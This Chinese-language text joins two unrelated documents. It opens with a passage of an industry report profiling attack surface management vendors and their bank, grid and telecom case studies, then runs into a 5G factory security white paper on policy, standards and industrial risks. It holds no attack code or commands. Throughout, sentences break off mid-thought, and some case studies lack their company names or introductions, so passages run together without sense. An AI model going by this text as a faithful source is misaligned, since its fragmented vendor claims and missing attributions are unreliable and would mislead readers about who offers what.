年成立以来始终聚焦于安全运营领域技术和产品的研发,公司成立 后首先推出了安全编排自动化与响应(SOAR)产品 HoneyGuide ,AssetWise 实时资产 治理系统则是雾帜智能发布的第二个平台型产品,定位于 CAASM 方向。在资产识别中, AssetWise 除了主动探测外,还可以 API 对接和日志方式采集第三方 HIDS 、 EDR、桌面 管理系统、 CMDB、AD 域以及交换机、日志审计、网络准入等数据源的资产信息, 力求对 企业内网的全量资产进行发现和关联分析。在资产漏洞风险评估上, AssetWise 会结合自 身与第三方扫描器结果综合判断。AssetWise 提供了丰富的资产类型自定义功能, 并在风 险处置流程中采用低代码、拖拽形式实现灵活、易用的自动化响应工作流。 19. 迪普科技 基于多来年在实网攻防、重保服务、行业专项安全服务项目中沉淀的技术与经验, 迪 普科技推出了以人+工具+平台三要素相结合的攻击面管理整体解决方案。方案以多层次、 体系化的全局视角,全面梳理企业内外网暴露面和与之存在的攻击面风险, 并针对不同客 户的需求以服务、服务(为主) +平台、平台(为主) +服务等多种灵活的形式对企业安全 运营建设赋能。 通过实现资产与漏洞风险管理平台、API 数据安全风险管控平台、网络威胁管理平台、 安全运营管理平台这 4 个自有平台的能力汇聚与数据贯通, 迪普科技可以提供攻击面风险 预判, 事中积极防御、事后快速响应的完整闭环。同时, 依靠自身服务能力与生态链的结 合,迪普科技也可以提供面向企业互联网风险监控与暴露面收敛服务。 迪普科技在攻击面管理解决方案上积累了比较丰富的客户案例,并在公安政法、运营 商、电力等行业实现了深度应用。 20. 天防安全 北京天防安全科技有限公司成立于 2017 年,是物联网安全行业的新兴厂商,创始人 段伟恒先生曾任启明星辰集团公安业务副总经理、集团副总裁, 有十五年以上的的网络安 全从业经验。 天防安全以视频监控系统安全防护为物联网安全的切入点, 深耕全国公安视频监控安 全领域,积累了大量的视频监控领域 IoT 设备指纹库和 IoT 设备漏洞库,并以此为基础推 出相应产品,并提供攻击面管理中的 CAASM 能力,包括视频设备资产盘查、弱口令发现 及管理、漏洞扫描及补丁修复等。 21. 万物安全 万物安全成立于 2018 年,以物联网安全为定位,产品覆盖资产监测及管理、安全准 入、边界防护、泄漏防护和态势感知,并在金融、公检法司领域重点布局。 公司通过对物联网资产(PC、服务器、摄像头、 IP 对讲、报警系统、门禁系统、网络 打印机等)的指纹库和漏洞库的积累,先后推出了星空- 网络空间资产测绘系统和银河- CAASM 系统, 星空- 网络空间资产测绘系统主要通过探针发现、指纹识别、流量分析、第 三方系统对接等方式, 实现全网物联网资产测绘, 而银河-CAASM 系统则提供物联网资产 的漏洞扫描、弱口令发现及管理、私接仿冒等恶意行为监测、合规检测和风险等级评估等 能力。 (一) 三六零数字安全集团-----某国有大型银行安全运营中心项目 (攻 击面部分) 公司简介: 360 数字安全集团(三六零数字安全科技集团有限公司)是数字安全的领导者,专注为 国家、城市、大型企业、中小微企业提供数字安全服务。 360 攻击面管理方面基于外部攻 击者视角和内部安全运营视角, 从传统 IT 资产、云资产、影子资产、新兴资产、数据资产 等多个维度全面梳理企业资产与风险数据并评估应用风险,形成全网攻击面管理能力。 项目简介: 客户为国有大型银行, 世界 500 强品牌。项目整体为安全运营中心建设项目, 需要对 内外网攻击面进行全面梳理, 实现分行总行资产、风险数据集中纳管, 形成攻击面管理能 力,以支持各项日常安全运营工作开展,并具备突发安全事件定位能力。 项目建设情况: 图 26:三六零数字安全——某国有大型银行安全运营中心项目(攻击面部分) 建设情况 u 在实现数据隔离的前提下,实现了对分行、总行资产集中纳管,并提供统一管 理标准。 u 对资产分区分域管理,持续监控并发现新增资产,不断提高攻击面可见性,杜 绝安全管理盲区。 u 在面临突发安全风险时,可快速进行排查,精准定位资产以及相关责任人,从 而实现处置闭环,收窄攻击面风险。 公司简介: 北京华云安信息技术有限公司, 基于攻击者视角构建集主动防御、情报协同、溯源反 制于一体的新一代网络安全防御体系, 提供完整的攻击面管理解决方案, 涵盖网络资产攻 击面管理(CAASM)、外部攻击面管理(EASM)、渗透与攻击模拟(BAS) ,实现对企 业数字化资产风险的持续检测、分析、响应和监控。通过灵洞 · 网络资产攻击面管理平台 (Ai.Vul)、灵知 ·互联网情报监测预警中心(Ai.Radar)、灵刃 · 智能渗透与攻击模拟系统 (Ai.Bot),基于攻击者视角从不同维度打造实战化、体系化、常态化的新一代数字安全 风险管理解决方案。 项目简介: 随着国家电网数字化转型步伐加快, 软件系统越来越庞大, 开源组件、代码复用以及 数字化应用场景等极大增加了网络攻击面; 近年来攻击手法的多样化和复杂化, 使重要信 息系统和关键基础设施面临着较大的安全风险, 如何保障电力基础设施的安全成为网络空 间对抗新时代的主要挑战。 某国网省公司, 面对不断增加的数字资产以及未知资产不可控带来的攻击面外溢影响 企业安全防御能力, 需要针对目前网络安全防御体系中安全设备防御有效性进行验证, 并 针对企业内外部攻击面进行管理,项目预算金额千万。 项目建设情况: 本系统聚焦“高强度网络攻击场景下的对抗防御能力”建设, 通过聚合电网实战化攻 防战法和网络资产攻击面情报, 提供自动化网络渗透评估、网络攻击与 APT 防御评估、软 件供应链安全评估、工业网络安全防护评估、敏感数据防护评估等安全场景, 构建“实战 化、体系化、常态化” 的新一代网络安全运营体系。 图 27:华云安—— 国网某省公司基于攻击实战场景下的攻击面管理项目建设情况 项目亮点: u 系统融合华云安基于知识图谱的网络安全风险情报库,通过分布全球的节点数 据采集能力,跟踪网络环境中的每个威胁行为,应用知识图谱和人工智能技术 帮助客户发现高级安全威胁,提升安全体系防御能力。 u 系统融合了由实战型 PoC/Exp/武器/工具等组成网络安全攻防战法库,对用户 整体安全防御能力进行验证评估。 u 系统采用了华云安智能渗透及攻击模拟引擎,以攻击者视角,通过多种攻击手 段对用户网络安全防御体系有效性进行验证评估。 客户价值: u 建立起一套以攻击面管理为思想,安全防御有效性评估为能力的安全运营体 系。 u 优化安全防御策略 50%以上,安全设备防御能力有效性提升 90%以上。 u 对于企业暴露在互联网的数字资产进行攻击面收敛,帮助企业快速自动化规避 安全风险。 u 为企业提供攻防实战演练及重大保障活动的防御有效性检验,将演习成果固定 化、深度防御常态化。 (三) 盛邦安全-----某运营商互联网资产暴露面发现与安全治理方案 . 公司介绍: 远江盛邦(北京)网络安全科技股份有限公司(简称:盛邦安全)成立于 2010 年, 专注于网络空间安全领域, 以“让网络空间更有序” 为使命, 为客户提供网络安全基础类、 业务场景安全类、网络空间地图类安全产品及服务。盛邦安全倡导“安全有道, 治理先行” 的发展理念, 秉持精准识别、精确防御、深入业务场景的“两精一深” 的研发战略, 聚焦 漏洞及脆弱性检测、应用安全防御、溯源管理及网络空间地图等技术领域, 致力于从网络 空间视角剖析数字世界,构建数字世界的网络空间地图,赋能各行业客户的数字化转型, 护航国家网络空间安全战略的实施落地。 项目介绍: 该运营商客户需要建立企业集团网络空间资产暴露面全量数据仓库, 绘制资产全息指 纹画像信息; 健全资产备案管控措施, 助力企业完成各级单位资产备案稽查核验工作, 发 现漏报、瞒报、未知、违规等资产威胁风险; 对高危漏洞、0Day/1Day 漏洞快速资产普查 和定位风险资产,及时处置修复,减少网络资产漏洞风险暴露面。 项目建设情况: 各省分公司、分支机构 镜像流量 防火墙 核心交换 资产学习引擎 资产上报 地市公司、下属单位 图 回 镜像流量 资产学习引擎 防火墙 核心交换 图 28:盛邦安全—某运营商互联网资产暴露面发现与安全治理项目建设情况 项目亮点: u 建立“云+地”协同模式,在集团总部和各省市机构本地部署资产测绘和流量 学习设备,并结合云端资产测绘服务,实现企业互联网全网资产暴露面普查, 建立全网数据仓库; u 通过与集团资产运管平台 API 集成,实现对集团全网各省市分公司所属资产暴 露面测绘普查,逐级核查资产备案及上报的真实性、合规性和完整性; u 通过调用资产安全漏洞检测引擎,快速完成企业互联网资产漏洞普查和 PoC 漏 洞验证,及时发现资产高危漏洞,快速定位资产,主动通报处置,降低资产风 险暴露面; 客户价值: u 全面梳理企业网络资产全景图,实现互联网资产清单可知可控,降低企业互联 网资产暴露面风险; u 绘制网络资产指纹图谱,动态更新资产台账,实现资产、机构、人员、供应链 等信息关联绑定,定位责任主体,快速响应处置,落实企业资产备案管理要 求,提升资产安全管控能力; u 开展网络资产安全漏洞监测,快速定位查询并及时预警通报;快速修复漏洞并 加固处置,贯彻网络安全相关法律法规要求,主动收敛资产攻击面风险,提升 企业安全防护能力。 (四) 魔方安全- ----某股份制银行攻击面管理最佳实践 . 公司简介: 魔方安全专注于攻击面管理和网络空间资产安全相关技术研究、产品研发和运营服务, 包括: 外部攻击面管理(EASM)、网络资产攻击面管理(CAASM)、漏洞管理(CVM)、 安全攻防服务, 并推出业内首个攻击面可视化(VASM)解决方案。凭借多年金融客户的服 务经验, 总结《金融攻击面管理方法论》, 配套精细化攻击面运营服务, 协助用户构建攻 击面高阶运营能力。以下案例为魔方安全与某股份制银行在攻击面治理领域七年的的实践 与创新,实现攻击面管理的指标化运营。 项目建设情况: 图 29:魔方安全——某股份制银行攻击面管理最佳实践项目建设情况 客户价值: u 构建攻击者视角的资产全景视图:传统的 IT 信息资产 + 新型的数字化资产一 本账,持续监测影子资产,全面覆盖新业态数字化资产。 u 敏感信息泄露全掌握,可下架:依托平台化的大网数字风险搜索引擎,先于攻 击者发现开源社区、网盘、文库、暗网等泄漏信息,学习引擎上下文验证,提 供验证与告警,并可协助下架处理,有效避免网络入侵、数据泄露、监管问责 等风险 u 风险持续监测,快速收敛:结合魔方持续更新的 POC、漏洞情报库,当高危漏 洞事件爆发,第一时间知晓并定位、闭环。 (五) 长亭科技- ----互联网攻击面管理建设项目 . 公司介绍: 长亭科技是国际顶尖的技术驱动型安全公司之一,全球首发基于智能语义分析的下一 代 Web 应用防火墙产品;目前,公司已发布 10 余款自研技术驱动产品服务,形成以攻 (安全评估系统) 、防(下一代 Web 应用防火墙、高级威胁分析预警系统) 、知(安全分 析与管理平台、攻击面管理运营平台)、查(主机安全管理平台)、抓(伪装欺骗系统) 为核心的新一代安全防护体系, 并提供优质的安全测试及咨询服务, 为企业级客户带来智 能的全新安全防护思路。 项目介绍: 近年来, 随着云平台、物联网、大数据等技术快速发展, 某大型保险公司网络资产边 界快速拓展,扩大了企业资产暴露面,且基于供应链的新型攻击也大大降低了攻击成本, 企业面临的风险加剧。随着网络安全实战化的演进,客户希望通过切实有效的方式, 对互联 网攻击面进行统一的管理,寻找有效的技术手段,协助企业建立一份基于资产、脆弱性、 风险管理的运营体系, 提高互联网攻击面的感知能力, 减少企业受攻击范围, 提升企业基 于实战化背景下的安全能力。 客户要求通过 SaaS 服务,以周期性和定制化续期提供互联网资产暴露面核查服务(包 括: 资产基础信息、幽灵资产发现、互联网应用组件暴露面等) ;公网敏感信息发现与监 控服务, 支持发现暴露在 Github、网盘、文库上的敏感信息; 互联网主机/web 漏洞扫描, 支持对网站进行 web 和系统漏洞扫描,发现系统环境潜在风险隐患,提供专业漏洞扫描 报告, 和对应的整改建议; 互联网模拟攻击入侵, 高级红队模拟攻击入侵, 对客户的防护 进行验证; 失陷主机识别、 IP 全端口监控、防护检测有效性评估、网站可用性监控、钓鱼 /仿冒网站监控等服务。 项目建设情况: 用户输入基础数据 威胁情报数据 PassiveDNS ICP 备案 域名 WHOIS BGP AS peer BGP AS membership APNICASN 数据 IP/网络 IMAP / SMTP / POP3 证书 公司及分支机构信息 云端数据 安全能力中心 云上环境 AWS VMware OpenStack 阿里云 腾讯云 华为云 云下IDC 主机端Agent SCA/代码/配置 网络设备 全流量分析 攻击面发现 互联网暴露 资产管理 开发框架 开源组件 邮箱 OA系统 VPN 云图产品控制台 安全工单 SOC SOAR 图 30:长亭科技——互联网攻击面管理建设项目建设情况 项目亮点: u 基于长亭多年实网攻防经验设计,更贴近攻击者视角; u SaaS 模式无需部署,无需占用客户资源; u 自适应弹性扩容; u 专业数据报表,为客户提供强有力的数据支撑; u 专业的安全服务团队,协同响应; u 攻击面 7*24 小时持续运营; 客户价值: u 完善了在攻击视角下基于资产、脆弱性、威胁的风险管理提供重要支撑数据; u 完善了对影子资产、未知资产的管理; u 完善了对 Github、网盘等各类敏感数据泄漏的管理; u 实时掌握互联网 IT 资产动态变化情况; 产, 以攻击者视角自动、实时、智能地识别和管理暴露面, 助力企业安全事业在未雨绸缪 中稳步发展。成立至今, 未岚科技已完成两轮 1000 万+融资, 至今已有多个金融客户项目 落地, 有 20+金融、能源客户 POC。帮助企业安全部门平均发现 40%的未知资产, 5 分钟 内完成 1day 漏洞应急响应, 提高 3 倍运营效率的同时, 节省了 30%人力成本, 获得客户 高度认可。 项目介绍: 未岚科技「3+3+3 全场景一体化攻击面管理平台」将网络资产攻击面(CAASM)、外 部互联网资产识别(EASM)、内部全网资产测绘(CAM)三大能力整合,通过 API 适配 网关连接客户的各种设备和系统,全方位获取海量资产数据并对其深度分析,利用自研、 独创的 VPT 智能算法过滤“误报”漏洞, 识别高危、 1Day 漏洞, 帮助企业安全运营人员 快速、高效地做出安全管理运营决策。 项目建设情况: 融合 资产去重 置信度判定 字段选举 属性富化 评估 暴露面评估 漏洞优先级 资产健康度 安全覆盖度 关联 业务关联 风险关联 归属关联 属性关联 内部全网资产测绘能力 影子资产 内部未知 图 31:未岚科技——全场景化攻击面管理建设项目建设情况 项目亮点: u 通过在客户线网中部署 CMDB 、 EDR、漏扫、准入、 API 网关、容器安全、云 平台、堡垒机、外网监测等近 10 几个厂商的 30 几个设备,对资产数据集中采 集分析,形成全面、准确、细粒度的资产台账。 u 资产类型覆盖:主机、虚拟机、终端、容器、数据库、中间件、网络设备、物 联网设备、 API、外网 URL 等 10 几类,为客户量身定制出丰富的安全度量指 标,并提供灵活的资产查询 API 接口供第三方系统消费调用。 u 同时,在客户端部署漏洞管理平台,集中采集多个异构漏洞,扫描设备数据, 并对其进行泛化,去重,将资产上下文、网络访问关系上下文和漏洞情报上下 文数据结合对漏洞数据进行富化,再利用未岚独创的 VPT 算法分析每个漏洞的 可利用性,进而对漏洞修复优先级重新定义,最终根据漏洞所在资产或软件的 运行上下文给出可自动化执行的缓解措施。 防御范围的尺度, 与客户一起重塑安全边界, 帮助客户轻量化地保有动态度量和鉴别风险 的能力与权利,管理数字世界的风险的高新技术企业。云科安信聚焦防御、攻击、资产、 角色、路径、攻击模拟与验证等风险场景, 依托自身技术为客户重塑静态网络边界、动态 网络边界、互联网络边界、数字世界边界、物联世界边界 5 大安全边界。 项目介绍: 网络攻防进入大国攻防时代,大国攻防的本质是多维度叠加下的全新安全域的对抗, 任何一个维度叠加下的安全域都将使暴露面与风险呈指数级增长。银行作为国家金融基础 设施, 也面临越来越复杂多变的风险, 需要用新的安全边界来度量风险尺度, 在安全建设 的有效性和成本投入中找到平衡点,发现、验证攻击面进而收敛暴露面并作相应治理。 项目需求: u 资产风险识别:从互联网探测和梳理银行的全部可发现资产并鉴定资产风险暴 露面。 u 风险验证:在暴露面中梳理资产脆弱性,并对其可利用性进行验证,完成风险 画像。 图 32:云科安信——某银行攻击面管理项目建设情况 项目亮点: u 以风险为核心,以数字世界为视角,重新审视划分银行数字资产; u 通过多维度叠加的方式主动探测重塑后的安全边界风险,扩宽安全防御范围和 能力的尺度; u 完成新一代安全架构的闭环管理,做到“预测、防御、验证、响应” 的完整闭 环; u 降低了客户在风险探测与治理上的成本。 客户价值: u 重新定义了安全风险边界,从全新框架弥补了过往安全防御的盲区; u 将风险以信息图鉴的方式具象化,并随时随需动态度量其变化,实现风险可 控; u 将风险度量与验证的能力与权利以简单轻量的方式交还给客户,从完整的数字 世界视角把握风险实情; u SaaS 平台与本地化相结合,实现风险管理自动化、可持续、可追溯。 (八) 螣龙安科- ----金融集团型企业资产测绘及管理解决方案 . 公司简介: 上海螣龙科技有限公司(螣龙安科) 是新一代主动安全厂商, 致力于实现安全自动化 及安全可视化。公司核心团队来自上海交通大学网络空间安全学院, 是信息安全领域的资 深专家。以螣龙天眼攻击面管理系统为基座, 螣龙安科为企业搭建全链条的安全验证体系, 提供真实、实时、量化的“安全体检报告 ” ,实现高度自动化的资产梳理发、风险检测, 以及资产异动监控, 从“主动安全”视角重新构建企业网络安全壁垒, 赋能企业数字资产 的高质量管理。公司客户覆盖金融、政务、能源、运营商等多个领域, 且获得来自顺为资 本、名川资本等一线市场基金的资本支持。 项目简介: 某金融集团型企业在数字化转型的进程中, 线上业务体量持续增长、复杂度不断提高, 因此在安全建设方面遭遇以下痛点: u 网络资产数量爆炸:集团总部及下属单位的网络资产及内外攻击面急速扩大, 且资产更新周期短、速度快; u 资产/攻击面可见性差:缺乏全面且自动的资产管理方案,无法建立起有效且全 面的资产拓扑图; u 管理方式依赖人力效率低下:下属单位遍布全国,难以实现统一管理,资产清 单及漏洞检测时效性低; u 响应速度不满足需求:资产管理的滞后,使得面对新安全风险的人工响应速度 进一步低于风险通报的速度。 项目建设情况: 图 33:螣龙安科——金融集团型企业资产测绘及管理项目建设情况 项目亮点: 螣龙安科根据金融行业及集团单位的特性, 结合产品优势, 采用了以下四大技术点来 解决现存的困境: u 基于探针工作模式的分布式容器部署架构; u 主动扫描与被动流量分析的自动化测绘; u 动态交互式拓扑图及 3D 可视化大屏; u 含大量 POC 及未公开 1-DAY 的漏洞库。 客户价值: 公司简介: 北京华顺信安科技有限公司是一家专注网络空间资产测绘与资产安全运营管理的安 全厂商, 总部位于北京, 并设上海、深圳、长沙、成都、武汉等多地分支机构。华顺信安 将网安实战攻防作为重点研究方向, 公司安全专家连续多年在各地攻防实践演练中取得优 异成绩,同时公司旗下 FOFA 平台是全球安全人员频繁使用的互联网资产测绘搜索引擎, 通过数年累计,华顺信安已拥有超过 51 亿条网络空间资产库数据,并以此打造出独有的 网络空间资产安全生态。华顺信安先后获评国家高新技术企业、国家级专精特新小巨人企 业等。 项目简介: 在该项目中,客户提出以下需求: u 需对散布在不同类型设备中的不同种类的全量 IT 资产信息进行集中管理和可视 化; u 金融机构因数字化转型带来的互联网暴露面不断扩大。客户需对其未知资产、 僵尸资产、数字资产等互联网暴露面进行收敛及风险管理; u 提高各类安全工具或安全策略的覆盖率,直观展现各类资产安全指标; u 通过将多维资产数据,提升安全运营效率,形成整体防御、精准防御能力,提 升该金融机构网络安全事件处置效率和应急响应速度 。 项目建设情况: 图 34:某大型金融行业单位攻击面管理实践项目 项目亮点: 基于攻击者视角全面梳理暴露面及攻击面, 通过多种前沿核心技术, 帮助该客户实现 基于资产的安全运营, 能够更快发现威胁、评估合规差距、确定风险优先级, 以提升安全 运营效率和网络安全防护水平。 u 实现全网 IT 资产的集中管理和可视化;
standards
前 言 数字经济发展速度之快、辐射范围之广、影响程度之深前所 未有, 正在成为重组全球要素资源、重塑全球经济结构、改变全 球竞争格局的关键力量。二十大报告提出建设数字中国, 加快发 展数字经济, 促进数字经济和实体经济深度融合, 打造具有国际 业领域安全既面临来自互联网的外部威胁, 又与工业生产的内部 安全问题相互交织,安全风险更加严峻,体现在攻击路径增多、 安全意识薄弱、数据安全等多个方面。传统的安全解决方案不能 满足新的需求,必须建立 5G 工厂网络安全架构,助力新时期新 形势下的工业信息安全能力提升, 切实为制造强国和网络强国战 略的有效实施保驾护航。 本白皮书在深入研究 5G 网络、工控领域网络及工业企业数 字转型遇到的安全问题, 通过总结工业领域在新型工业化进程中 的安全挑战, 提出 5G 工厂网络安全参考架构, 并对 5G 工厂安全 所涉及的多种关键技术给出了详细介绍, 为各行业、各企业开展 5G 工厂安全建设提供参考。 一、概述 (一)背景 工业制造是实体经济的基础, 是国家经济的命脉所系, 同时也是 大国竞争中构筑未来发展战略优势的重要支撑,制造强国战略也成为 中国实现伟大复兴的重要战略。工业互联网是新一代信息通信技术与 工业经济深度融合的全新工业生态、关键基础设施和新型应用模式。 形成的产业和应用体系, 是工业数字化和智能化发展的关键综合信息 基础设施。其本质是以网络互联为基础, 通过对工业数据的全面深度 感知, 实现智能控制、运营优化和生产组织方式变革,为企业数字化 演进提供了技术保障和实践基础。5G 工厂的发展能够帮助企业快速 实现数字化转型。 当前, 我国“5G+工业互联网”创新发展进入快车道, 5G 工厂在 工业领域应用的重点将从生产外围辅助环节逐渐向生产中心控制环 节迈进。作为数字经济的重要基础设施, 新一代信息技术对制造业进 行全方位、全角度、全链条的持续改造和优化,加速引爆工业格局的 变革。 5G 工厂作为新一代信息技术与制造业转型发展历史性融合创 新期的新生事物,正在加速推进新型工业化进程。5G 工厂具有广阔的 不断增加。工业领域的安全事件频发,尤其在电力、石油、铁路运输、 燃气、化工、制造业、能源、核应用等相关领域的关键网络一直都是 全球攻击者的首选目标。据国家工信安全中心统计,2022 年公开披露 的工业信息安全事件共 312 起; 工业领域勒索事件共 89 起, 较 2021 年增长 78%;工业领域数据泄漏事件共 338 起,比去年增长 25.2%。 这些攻击给个人、企业、国家带来了不同程度的损失。 工业领域的网络安全存在以下趋势: 一是, 第四次工业革命驱动 工业数字化、网络化、智能化,使数据成为核心生产要素, 因此工厂 需要收集 IT、OT 等各领域数据,进而形成工厂 IT/OT 网络融合的趋 势,使得工控安全与互联网安全交织在一起, 安全问题变得更复杂; 二是, 合法指令的违规操作将成为常态, 防火墙、数据网闸等传统 IT 工业企业高质量发展和高水平安全的动态平衡,为实现数字中国建设 保驾护航。 二、工业领域安全政策与标准 (一)安全政策 网络安全作为我国经济社会数字化转型的关键驱动力,我国政府 从 2017 年至 2023 年, 发布多个相关网络安全法律政策。《中华人民 共和国网络安全法》自 2017 年 6 月 1 日正式施行,是我国第一部全 面规范网络空间安全管理方面的基础性法律, 对我国的网络空间法治 建设具有重要的里程碑意义。工业企业网络安全关系到国家经济社会 可持续发展, 是事关国家长治久安的重大战略问题。为促使工业企业 全面落实国家政策法规,持续打造基于自身核心竞争力的工业网络安 全保障”和“安全可靠”为建设思路,以提升“安全保障能力”为发 展目标。2019 年 7 月,工信部等十部门联合印发《加强工业互联网安 全工作的指导意见》, 成为推动工业互联网安全纲领性文件, 指出了 工业企业、监管部门和专业机构的能力建设方向, 指出了明确责任和 完善安全管理体系,指出了加快安全人才培养。2022 年 9 月,工信部 印发《5G 全连接工厂建设指南》中指出推进企业全面落实工业互联网 企业网络安全分类分级管理相关政策与标准,提升设备、控制、网络、 平台和数据等安全防护能力。 为更好地推动网络安全政策落地实施,工业和信息化部先后推动 开展工业互联网安全深度行活动,深入宣贯工业互联网安全相关政策 规范,推动在全国范围内深入实施工业互联网企业网络安全分类分级 业的前列。企业通过分类分级提升数据汇聚能力、数据开放能力、数 据治理能力, 以安全策略为指导, 构建起了全面、完整、高效的信息 安全体系, 为业务的创新发展提供了坚实的信息安全保障。随着国家 顶层设计完善、底层落地得到大力支持、企业数据意识和安全意识等 的不断提高、相关技术的不断进步,工业企业会更加认可 5G 在工厂 中的安全应用, 更多的企业开展 5G 工厂建设, 帮助工业企业提质、 降本、增效、绿色、安全建设,从而提高整个行业的安全水平。 (二) 安全标准 标准化工作是实现工业领域信息和网络安全的重要技术基础。各 国政府高度重视工业领域的网络安全标准体系建设, 以美国、欧盟为 首的国家和组织纷纷出台政策, 在原有的网络安全标准基础上, 积极 推动工业领域网络安全标准体系建设。美国国家标准与技术研究所 我国在工业领域网络安全标准体系建设相较于国外发达国家起 步较晚, 但发展迅速,至今已出台多部工业网络安全标准, 涉及 5G 安 全、工业互联网安全、工控安全等多个细分领域。据不完全统计, 国 内标准组织 CCSA、TC260 发布了 30 余项工业网络安全相关的国家标 准, 主要围绕工业自动化和控制系统、工业控制网络与信息两方面开 展研究,TC260 发布了《信息安全技术 工业互联网数据安全防护指 南》、《信息安全技术 关键信息基础设施安全保护要求》、《信息安 全技术 关键信息基础设施安全保护要求》、《信息安全技术 网络安 全等级保护基本要求》、《信息安全技术 工业互联网平台安全要求 及评估规范》等一系列标准。CCSA 发布了《工业互联网网络安全总体 要求》、《工业互联网平台安全防护要求》、《工业互联网数据安全 布局工业 5G 网络安全标准, 重点关注网络信息防护、工业 5G 网络设 备的安全可靠性建设。 三、工业领域安全挑战 工业企业在数字化转型过程中,原本相互分割的 OT 和 IT 网络将 逐渐交汇融合。 OT 和 IT 网络的融合并非两张网络简单相连, 而是以 5G、人工智能、物联网、云计算、大数据等为代表的新一代信息技术 在工业领域中的应用, 这将给工厂网络、数据、管理制度等带来诸多 变化。与之而来的工厂信息安全变得复杂,安全风险呈现多元化特征, AGV 等) 等设备将实现互联互通。当前现场设备自身的安全运行要求 和规则尚不健全, 终端设备彼此建立通信, 设备的各种系统安全缺陷 与漏洞也同样会引入到工业网络中,导致工业网络安全问题变得复杂。 受工业特征的影响,现场终端设备的软件系统更新速度要远慢于工业 企业完成数字化转型速度。大量含有漏洞的设备暴露于互联网上, 一 旦这些终端被入侵者利用, 容易形成规模化的设备僵尸网络, 将成为 新型高容量分布式拒绝服务(DDoS)攻击源, 对工业应用、后台系统 等构成巨大的安全威胁。 5G 工厂同样会面临含有漏洞的设备暴露于互联网上的问题,甚 至会让传统不同域之间的终端设备彼此通信变得更加便捷, 因此, 需 要设计有效的防护方式, 减少终端设备的攻击面和攻击路径, 将安全 互联网带来了安全方面挑战。一是人工智能可被武器化,助力网络攻 击。人工智能自我学习能力和自组织能力可用于寻找漏洞、破解密码 等, 提高网络攻击效率。 二是人工智能可被滥用, 威胁个人隐私。人 工智能应用会增强信息采集和数据挖掘能力, 加大了隐私泄露风险, 甚至可能导致数据匿名化、数据脱敏等安全保护措施无效。三是人工 智能可决策失误,威胁人身安全。人工智能系统一旦出现感知、认知 偏差或者受到网络攻击, 系统就可能判断失误,并采取错误行动,甚 至危及现场生产安全。 在工业领域大力发展人工智能的同时,必须高度重视 A I 技术可 能带来的安全风险。5G 工厂作为工业企业数字化转型的信息基础设 施, 在促进人工智能技术在工业领域应用的同时, 也应为人工智能应 工业互联网以人、机、物全面互联为目标, 实现工业设备及系统 之间的数据流动,促使工厂围绕生产经营形成一个系统化的智能体系。 工业互联网也会促进 OT 与 IT 网络融合,模糊并泛化了 OT 与 IT 网络 的安全边界,让互联网领域的安全网络风险向工厂 OT 网络延伸。工 业行业本身存在的网络工业协议设计缺陷、工业控制系统漏洞、网络 安全防护缺失等问题,工业企业虽然对传统工业网络采取了一定的安 全防护措施,但其工业控制系统网络中存在的居多安全漏洞和风险隐 患并未消除。融合带来的互联网安全风险, 会与传统工业网络安全风 险相互作用相互影响, 形成了更为复杂严峻的工业网络安全挑战。工 业互联网面临着攻击面广泛、攻击无处不在、平台网络风险日益严峻、 物理安全威胁剧增等问题。 数据难, 导致工厂的数据资料存在滞后性、分散性和复杂性的特点。 由于传统工厂数据的滞后性大, 缺少数据的联动和共享渠道, 设备的 运行状态没有实时的反馈, 产线捕捉重要数据并没有形成系统化的监 测,使得管理人员没办法通过零碎和复杂的数据来提升生产效益。 工业企业数字化转型是驱动工业数据融合的重要引擎。工厂在数 字化、网络化和智能化的发展进程中,会推动工业领域的数据加速融 合。工业数据包含大量敏感信息, 包括研发设计、开发测试、系统设 备资产信息、控制信息、工况状态、工艺参数、系统日志、物流、产 品售后服务等产品全生命周期各环节所生产的各类数据,这些数据往 往属于工业企业的机密。随着工业企业数字化加速转型,传统工业控 制闭环中沉没与消失的数据将被开放出来,生产全流程的数据将以标 后难以追踪溯源, 数据安全性难以保障。三是当前大多数工业企业的 数据安全能力无法满足新形势下的安全需求问题。大多数工业企业对 工业数据的存储、使用和销毁的管理模式依然较为落后,未建立完善 的数据安全管理制度, 未落实授权访问机制和防篡改、防窃取、防误 删等技术手段, 没有规范完备的数据使用管理和销毁机制。 (五)安全设备 工业领域安全设备也可以分为三类,第一类是针对工业控制网络 (OT)提供安全网关、网络行为与日志审计、入侵检测、主机加固、 安全运维审计(堡垒机) 、脆弱性检测、集中安全管理等; 第二类是 针对工厂和企业管理区网络(IT)提供传统信息安全等保要求的安全 设备。第三类是融合自身自动化产品安全属性的安全设备。当前工业 计、监测、防控一体化和智能化、信息化、平台化的综合工业安全能 力方向转型。5G 工厂的发展促使定制化安全设备加速出现,满足客户 不同产品形态、性能的需求。同时,国家高度关注信息安全设备的自 主可控, 将信息安全设备的国产化上升到国家安全的高度, 依靠自主 创新, 积极发展具有自主知识产权的信息安全设备。近年来, 在信息 安全产品国产化政策的推动下,信息安全设备的国产化替代趋势趋于 显现。 (六)管理方式 传统工厂的信息系统可分为 IT 系统和 OT 系统两类,通常归属两 个不同的部门管理。IT 部门是成本中心,他们的需求是安全,通过 IT 系统简化管理降成本。OT 部门是生产中心, 其诉求是安全生产, 提高 统将数据的保密性置于完整性和可用性之上, 而 OT 系统将可用性置 于完整性和保密性之上; 二是管理团队的协调问题, 随着智能技术在 IT 和 OT 系统中的深度应用, 打破了 IT 与 OT 系统相对独立的工作环 境, 一些重要系统管理可能需要多个部门参与, 每个部门都需要从不 同视角相互监督、相互协作来履行各自的责任和义务,共同完成管理。 OT 和 IT 融合是一个长期的过程, 在 5G 工厂下也不例外,因此需设 计伴随者 IT 与 OT 网络融合的不断完善、不断更新的工厂安全管理制 度。 执行制度靠人才,工厂 IT 网络与 OT 网络深度融合后, 需要配备 IT/OT 复合型人才保障工厂安全运营。 IT 与 OT 系统的信息安全属于 两个不同学科, OT 系统信息安全人员主要关注 OT 系统的可用性, 对 IT 系统知之甚少; OT 系统又存在很高的技术壁垒, 使得 IT 系统信息 安全人员无法深入了解 OT 系统。传统工厂中, IT 与 OT 网络长期的 物理隔离,使得工厂缺乏培养 IT/OT 复合型的信息安全人才的需求和 动力,造成该领域的复合型人才很少。随着 5G 工厂的大规模部署, 为更好的执行工厂安全管理制度, 因大规模培养 IT/OT/CT 复合型的 信息安全人才。 四、 5G 工厂安全参考框架 为了应对工业领域的终端、网络、数据和管理方式发生变化引起 的安全挑战, 针对当前存在的工业信息安全管理机制不健全、关键核 心技术能力不足、产业发展基础薄弱、工业企业安全意识不强等问题 和短板, 综合安全与发展, 提出 5G 工厂安全参考框架,助力新时期 新形势下的工业信息安全能力提升,切实为制造强国和网络强国战略 